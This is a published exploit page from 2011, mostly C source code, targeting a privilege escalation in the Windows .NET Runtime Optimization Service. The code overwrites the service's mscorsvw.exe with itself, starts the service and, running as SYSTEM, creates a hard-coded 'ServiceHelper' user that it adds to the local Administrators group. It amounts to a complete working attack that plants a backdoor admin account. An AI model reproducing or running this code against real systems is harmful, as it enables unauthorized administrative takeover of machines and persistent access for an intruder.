ExploitFixes
.NET Runtime Optimization Service Privilege Escalation Exploit 0day 2011-03-08 10:15:09

/*
# Exploit Title: .NET Runtime Optimization Service Privilege Escalation
# Date: 03-07-2011
# Author: XenoMuta <[email protected]>
# Version: v2.0.50727
# Tested on: Windows XP (sp3), 2003 R2, 7
# CVE : n/a

_ __ __ ___ __
| |/ /__ ____ ____ / |/ /_ __/ /_____ _
| / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
/ / __/ / / / /_/ / / / / /_/ / /_/ /_/ /
/_/|_\___/_/ /_/\____/_/ /_/\__,_/\__/\__,_/

xenomuta [at] tuxfamily.org
xenomuta [at] gmail.com
http://xenomuta.tuxfamily.org/ - Methylxantina 256mg

This one's a no-brainer, plain simple:

This service's EXE file can be overwritten by any non-admin domain user
and local power users ( wich are the default permissions set ).
This exploit compiles to a service that uses the original service's id.

Tested on Windows 2003, WinXP (sp3) and Win7
( my guess is that it runs on any win box running this service ).

greetz to fr1t0l4y, L.Garay, siriguillo and the c0ff33 br34k t34m!!

bless y'all!

*/
#include <stdio.h>
#include <windows.h>

SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;

#define PWN_EXE "c:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe"
#define PWN_SHORT "mscorsvw.exe"
#define PWN_NAME ".NET Runtime Optimization Service v2.0.50727_X86"
#define PWN_ID "clr_optimization_v2.0.50727_32"

void ServiceMain(int argc, char** argv) {
if (InitService()) {
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = -1;
SetServiceStatus(hStatus, &ServiceStatus);
return;
}
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (hStatus, &ServiceStatus);
}

void ControlHandler(DWORD request);
int InitService();

int main(int argc, char **argv) {
char acUserName[100];
DWORD nUserName = sizeof(acUserName);
GetUserName(acUserName, &nUserName);

if (strcmp((char *)&acUserName, "SYSTEM")) {
char *str = (char *)malloc(2048);
memset(str, 0, 2048);
snprintf(str, 2048, "%s.bak", PWN_EXE);
if (rename(PWN_EXE, str) != 0) {
fprintf(stderr, " :( sorry, can't write to file.\n");
exit(1);
}
CopyFile(argv[0], PWN_EXE, !0);
snprintf(str, 2048, "net start \"%s\" 2> NUL > NUL",PWN_NAME);
printf("\n >:D should have created a \n\n Username:\tServiceHelper\n Password:\tILov3Coff33!\n\n");
system(str);
}

SERVICE_TABLE_ENTRY ServiceTable[2];

ServiceTable[0].lpServiceName = PWN_ID;
ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;

ServiceTable[1].lpServiceName = NULL;
ServiceTable[1].lpServiceProc = NULL;
StartServiceCtrlDispatcher(ServiceTable);

return 0;
}

int InitService() {
system("cmd /c net user ServiceHelper ILov3Coff33! /add & net localgroup Administrators ServiceHelper /add");
}